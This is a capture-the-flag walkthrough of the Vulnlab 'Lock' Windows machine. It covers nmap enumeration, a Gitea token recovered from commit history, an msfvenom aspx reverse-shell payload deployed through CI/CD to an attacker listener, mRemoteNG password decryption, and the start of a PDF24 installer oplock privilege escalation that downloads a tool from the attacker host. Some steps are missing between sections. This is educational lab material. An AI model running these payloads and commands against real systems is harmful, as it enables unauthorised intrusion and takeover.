Lock is an easy windows box from Vulnlab created by xct and kozmer. It involves gaining a foothold by abusing CI/CD in Gitea to upload a shell, decrypting mRemoteNG configs, and gaining system access by exploiting the MSI installer in PDF24 Creator.
NMAP
As always, we start with a standard nmap scan
1 2 3 4 5 6
PORT STATE SERVICE 80/tcp open http 445/tcp open microsoft-ds 3000/tcp open ppp 3389/tcp open ms-wbt-server 5357/tcp open wsdapi
➜ lock sudo nmap -sCV -p80,445,3000,3389,5357 --min-rate=5000 10.10.78.126 | tee nmap.txt [sudo] password for serioton: Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-01-19 08:18 EST Nmap scan report for lock.vl (10.10.78.126) Host is up (0.049s latency).
PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: Lock - Index |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE 445/tcp open microsoft-ds? 3000/tcp open ppp? | fingerprint-strings: | GenericLines, Help, RTSPRequest: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 200 OK | Cache-Control: max-age=0, private, must-revalidate, no-transform | Content-Type: text/html; charset=utf-8 .... HttpOnly; SameSite=Lax | X-Frame-Options: SAMEORIGIN | Date: Fri, 19 Jan 2024 13:18:29 GMT | <!DOCTYPE html> | <html lang="en-US" class="theme-auto"> | <head> | <meta name="viewport" content="width=device-width, initial-scale=1"> | <title>Gitea: Git with a cup of tea</title> .... | HTTPOptions: | HTTP/1.0 405 Method Not Allowed | Allow: HEAD | Allow: GET | Cache-Control: max-age=0, private, must-revalidate, no-transform | Set-Cookie: i_like_gitea=8754cc9f87bf5b93; Path=/; HttpOnly; SameSite=Lax | Set-Cookie: _csrf=JMeupsqJURAdLO4SvVNoOVySlMM6MTcwNTY3MDMxNTA1NTIzMjMwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax | X-Frame-Options: SAMEORIGIN | Date: Fri, 19 Jan 2024 13:18:35 GMT |_ Content-Length: 0 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: LOCK | NetBIOS_Domain_Name: LOCK | NetBIOS_Computer_Name: LOCK | DNS_Domain_Name: Lock | DNS_Computer_Name: Lock | Product_Version: 10.0.20348 |_ System_Time: 2024-01-19T13:19:53+00:00 | ssl-cert: Subject: commonName=Lock | Not valid before: 2023-12-27T14:19:36 |_Not valid after: 2024-06-27T14:19:36 |_ssl-date: 2024-01-19T13:20:32+00:00; -2s from scanner time. 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Service Unavailable |_http-server-header: Microsoft-HTTPAPI/2.0 ...
From the Nmap scan, we can see there are 5 ports open.
WEB
We start by looking at the website on port 80, but there is nothing interesting so far.
GITEA
We have Gitea running on port 3000, so let’s go there. There is an interesting script inside the dev-scripts repository of the ellen.freeman user http://lock.vl:3000/ellen.freeman/dev-scripts/src/branch/main/repos.py which looks like it’s using a gitea access token. If we go to the commits we can see the Gitea access token is there in the initial commit:
1 2 3 4
... # store this in env instead at some point PERSONAL_ACCESS_TOKEN = '<REDACTED>' ...
Great, now we have the access token. What we can do with it? We can place it inside the script we just got and run it like this:
➜ lock cd website ➜ website git:(main) ls assets changelog.txt index.html readme.md
This looks like it’s the website running on port 80. The README.md file mentions something interesting
1 2 3 4
➜ website git:(main) cat readme.md # New Project Website
CI/CD integration is now active - changes to the repository will automatically be deployed to the webserver
Shell as ellen.freeman
The README file suggests that any changes made to the repository, such as adding or modifying files, will automatically be deployed to the associated web server. So the idea here to commit an aspx shell, which the CI/CD pipeline will then automatically deploy to the web server. Once deployed, we can get a shell by accessing http://lock.vl/shell.aspx. Let’s execute the attack. First, we need to generate an aspx shell using msfvenom like this:
1 2 3 4 5 6 7
➜ website git:(main) msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.0.210 LPORT=443 -f aspx -o exploit.aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of aspx file: 3402 bytes Saved as: exploit.aspx
After that, we need to add the exploit.aspx file to our Git staging area and commit the changes:
➜ lock rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.8.0.210] from (UNKNOWN) [10.10.78.126] 50949 Microsoft Windows [Version 10.0.20348.2159] (c) Microsoft Corporation. All rights reserved.
This is a mRemoteNG config file belonging to the gale.dekarios user. However, the password is encrypted. A quick google search for “mremoteng password decrypt” leads us to this tool https://github.com/gquere/mRemoteNG_password_decrypt that decrypts mRemoteNG configuration files. Running it gives us the decrypted password:
C:\\>cmd /c dir /A Volume in drive C has no label. Volume Serial Number is A03D-9CEF
Directory of C:\\
12/28/202306:17 AM <DIR> $Recycle.Bin 12/27/202312:38 PM <DIR> $WinREAgent 01/19/202404:56 AM <DIR> Config.Msi 12/27/202306:14 PM <JUNCTION> Documents and Settings [C:\\Users] 01/19/202404:36 AM 12,288 DumpStack.log.tmp 12/27/202311:11 AM <DIR> Gitea 12/27/202310:27 AM <DIR> inetpub 01/19/202405:47 AM <DIR> Microsoft 01/19/202404:36 AM 1,207,959,552 pagefile.sys 05/08/202112:20 AM <DIR> PerfLogs 12/28/202311:28 AM <DIR> Program Files 12/28/202311:24 AM <DIR> Program Files (x86) 12/28/202311:24 AM <DIR> ProgramData 12/27/202306:14 PM <DIR> Recovery 12/27/202306:14 PM <DIR> System Volume Information 01/19/202404:39 AM <DIR> temp 12/28/202306:14 AM <DIR> Users 12/28/202311:18 AM <DIR> Windows 12/28/202311:23 AM <DIR> _install 2 File(s) 1,207,971,840 bytes 17Dir(s) 5,546,426,368 bytes free
It contains some software installer files:
1 2 3 4 5 6 7 8 9 10 11 12 13
C:\\>cd _install
C:\\_install>dir Volume in drive C has no label. Volume Serial Number is A03D-9CEF
Directory of C:\\_install
12/28/202311:21 AM 60,804,608 Firefox Setup 121.0.msi 12/28/202305:39 AM 43,593,728 mRemoteNG-Installer-1.76.20.24615.msi 12/14/202310:07 AM 462,602,240 pdf24-creator-11.15.1-x64.msi 3 File(s) 567,000,576 bytes 0Dir(s) 5,546,401,792 bytes free
The installer should start. Now, we need to set an oplock on the faxPrnInst.log file as soon as it gets read. We can do that using the SetOpLock.exe tool from https://github.com/googleprojectzero/symboliclink-testing-tools. First let’s transfer it to the victim machine
1 2 3 4 5 6 7 8
PS C:\\temp> iwr <http://10.8.0.210/SetOpLock.exe> -outfile SetOpLock.exe PS C:\\temp> ls
Directory: C:\\temp
Mode LastWriteTime Length Name --------------------------- -a----1/19/20246:06 AM 116224 SetOpLock.exe